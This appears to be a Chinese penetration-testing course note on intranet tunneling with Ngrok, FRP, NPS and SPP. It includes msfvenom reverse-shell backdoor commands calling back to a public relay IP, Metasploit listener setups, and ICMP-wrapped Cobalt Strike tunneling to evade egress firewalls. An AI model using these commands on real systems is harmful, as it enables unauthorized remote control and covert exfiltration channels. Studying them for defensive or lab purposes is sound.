内网安全第一百二十七天

内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

目录

内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

#知识点：

内网穿透-Ngrok-入门-上线

内网穿透-Frp-简易型-上线

内网穿透-Nps-自定义-上线

内网穿透-Spp-特殊协议-上线

---

#知识点：

1、内网隧道&穿透&加密&上线

2、项目-Ngrok&Frp&Nps&Spp

本节课主要讲的就是内网穿透，它可以实现不同局域网的攻击，比如你在a局域网，目标在b局域网，你就可以利用内网穿透实现通过a中你的攻击机去攻击b中的目标主机。还可以实现绕过协议，这个就是我们之前讲的隧道的功能。主要就是一些工具项目的讲解。

Ngrok Frp Spp Nps EW(停更) 一共是这五个项目，因为第五个项目停更了，就只讲前四个，讲解顺序为Ngrok Frp Nps Spp。也是从难到易，工具的功能也会越来越强大。

优点：穿透加密数据，中间平台，防追踪，解决网络问题

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

内网穿透-Ngrok-入门-上线

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

支持的协议：tcp、http、https

支持的类型：正向代理、反向代理

1、服务端配置：

开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道

2、客户端连接服务端：

./sunny clientid 133328291918 //控制端连接Ngrok的服务器

3、客户端生成后门配置监听：

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 8888

run

这里先介绍一下背景，由于没有两个局域网的两台电脑，我们这里就利用自己电脑上的虚拟机kali去控制外网的一台服务器，如果说正向连接那是可以的，因为内网的kali能找到服务器，但是反向连接就不行了，因为kali在内网，服务器找不到kali。那么内网穿透就可以解决这个问题。

这里还是需要用到跳板机的，因为目标主机找不到kali，那么我们就可以先弄一个跳板机和他建立连接，而这个跳板机是服务器可以访问到的，所以就把权限给跳板机，然后再给内网的kali。

首先我们介绍一下如何用这个项目，先点击下面的链接注册账户然后去登录

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

登录完成之后点击隧道管理

然后需要付两块钱实名认证，不然开通不了隧道，也就是我们实验要用到的跳板机(你们就别买了，太卡了)

然后买最后一个这个免费的隧道

这里本地端口就写你kali的ip地址，端口随便写一个没占用的即可。(这里也可以看到只支持三种协议，后面要将的项目都比这个多，这个是最简单的)

选择tcp协议，因为是免费的网速不太行，选http会很卡(但我这里选择tcp一样连接不了服务端)

然后下载客户端，我这里因为攻击机是kali，就下载的linux的.此时的查看状态应该是不在线，等客户端连接服务端之后就在线了

然后我们输入命令让客户端连接服务端

然后因为是免费的，可能是因为限速就100k，然后我这里就连接不上(接下来的拿小迪的截图记笔记)

这里我们在生成木马的时候，监听地址应该写跳板机的，因为利用反向连接，目标主机找不到内网攻击机，下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候，跳域名就会解析到刚才设置的攻击机的ip和端口。从而实现内网穿透。

我们隧道是走的tcp的，生成后门的时候也要生成tcp的，不要搞错了。然后ip和端口就写隧道的(生成木马的图是小迪的图，所以域名和端口没有对上)

然后我们在本地kali打开msf开启监听，监听端口就是刚才生成隧道的时候的本地端口2222，然后服务器点击木马即可上线

内网穿透-Frp-简易型-上线

https://github.com/fatedier/frp

frp是一个专注于内网穿透的高性能的反向代理应用，支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。

自行搭建，方便修改，成本低，使用多样化，适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）

服务器修改配置文件frps.ini：

[common]

bind_port = 7000

启动服务端：

./frps -c ./frps.ini

2.控制端-下载-解压-修改-启动

控制端修改配置文件frpc.ini：

[common]

server_addr = 47.94.236.117

server_port = 7000 #frpc工作端口，必须和上面frps保持一致

[msf]

type = tcp

local_ip = 127.0.0.1

local_port = 5555 #转发给本机的5555

remote_port = 6000 #服务端用6000端口转发给本机

启动客户端：

 ./frpc -c ./frpc.ini

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6000 -f exe -o frp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 5555

exploit

3.靶机运行frp.exe即可

这里用飞哥的服务器来充当目标机器，我自己的服务器充当跳板机，也就是frp的服务器，然后本机的kali充当攻击机。

首先我们先让跳板机和kali建立隧道

先把frp文件放到自己的服务器上面，然后可以看到frps.ini和frpc.ini，frps.ini是服务端的配置文件，frpc.ini是客户端的配置文件

我们可以看到这里服务端的配置文件端口是默认的7000，等会在kali客户端的配置文件也应该是7000，然后两者先建立通道(不要忘记安全组把7000端口开放)

可以看到客户端也是默认的7000，上面的ip是跳板机的ip，下面的local_port是本机接受数据的ip，remote_port是跳板机用6000端口发送给kali

也就是说跳板机的安全组要开放两个端口，一个是用于连接的7000端口，一个是发送数据的6000端口，而kali的msf监听是监听本机的5555端口

然后我们启动服务端，

接着启动客户端

接着我们来到服务端，可以看到已经成功连接

然后kali启动msf生成木马，ip为服务器ip，端口为6000

然后监听本地5555端口，接着把后门放到目标服务器，也就是飞哥的服务器，点击后门。（因为目标主机为linux的，所以这里无论生成后门还是设置监听都要弄linux的，并且还不要生成exe文件，linux无法直接执行exe文件，建议生成elf文件）

这里也是成功的上线了

内网穿透-Nps-自定义-上线

GitHub - ehang-io/nps: 一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发，可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析、内网socks5代理等等……，并带有功能强大的web管理端。a lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。

-服务端：

1、启动

./nps install

./nps

http://IP:8080/ admin/123

2、创建客户端，生成密匙

3、添加协议隧道，绑定指向

远程绑定5555,指向本地6666

-客户端：

1、连接服务端：

./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v

2、生成后门：msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5555 -f exe -o nps.exe

3、监听后门：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 6666

run

首先我们把文件放到服务端，先给nps一个执行权限，然后输入命令./nps install

接着我们输入命令./nps

如果此时有提示端口占用就看哪个进程占用的，把他关闭就好了

然后我们输入服务器的IP和端口号8080进入到控制端，输入账号密码admin，123即可(像这些端口号和账号密码都是可以改的，在conf目录下的nps.conf，一些参数都是在这里面，我们可以自行修改)

实验背景：攻击机为虚拟机中的kali，跳板机为我的服务器，目标机器为飞哥服务器。

然后点击客户端，创建一个客户端，备注为1，其他的就不写的，如果写的话就是一些限制，这里就不做限制了

然后我们点击隧道

协议就选择tcp，服务器端口就是跳板机的接受端口，目标端口就是转发到哪个ip的哪个端口，这里我们不写ip就是本机，因为我们使用kali作为服务端的，所以这里就是kali本机的6666端口去接受数据。也就是说目标点击后门会把流量转发到跳板机的5566端口，然后转发到kali的6666端口，我们生成后门的时候生成5566端口的后门，好让目标去找跳板机，然后监听就监听本地的6666端口即可。

然后我们来到kali客户端，先连接到这个服务端,后面那个密钥就是刚才生成客户端的时候的密钥

此时我们再看服务端就会显示在线了

然后生成后门

飞哥点击后门之后，这边就会成功上线了。

这里我们可以看到他是支持很多协议的，也就是说不仅支持内网穿透，还有各种各样的隧道

这个项目还是很不错的，集合了ngrok和frp的优点。

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议：tcp、udp、udp、icmp、http、kcp、quic

支持的类型：正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到过一些极端环境，比如目标封了tcp，http等常用出网的协议，

但是icmp，dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

这个其实更偏向于隧道技术，我们在看这个图，现在的情况是防火墙对tcp的出站全杀了，然后我们这里利用spp这个项目把tcp封装成icmp出网，icmp协议到攻击机成功上线

实验背景不在是刚才的了，这里我们用到了win7，然后win7的出站协议tcp全禁，用外网的服务器去攻击这个win7上线cs

这个项目主要是用于隧道，它可以把tcp伪装成udp还可以伪装成icmp等等，还有其他协议的伪装，具体可以看下面的截图或者他的链接里面比较详细

之前我们讲这个的时候用的icmp隧道还有dns隧道，之前讲icmp隧道的时候是用的pingtunnel工具，这里我们利用这个项目来完成。(之前那个工具好像只能伪装成icmp，这个项目比较全面)

1、服务端：监听本地的icmp数据

./spp -type server -proto ricmp -listen 0.0.0.0

2、客户端：将本地的8082给到117这8081上（TCP封装icmp）

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

3、CS

监听器1：http 47.94.236.117 8081

监听器2：http 127.0.0.1 8082

生成后门：监听器2

这里大致过程就是利用cs监听器2生成的后门将win7的8082权限通过tcp协议移交给外网服务器的8081端口，但是因为spp项目的干扰，把tcp伪装成icmp协议发送了出去，然后服务器通过spp项目直接监听icmp的包，然后cs就会通过监听器1上线(这里cs服务端是外网的服务器)

这里我们现在服务器开启监听

然后在win7上面执行命令，我的就不行，小迪的就行，不知道怎么解决

然后cs设置两个监听器，监听器2生成后门，win7点击后门，监听器1上线。

这个比较简单，但是我这里整不了了。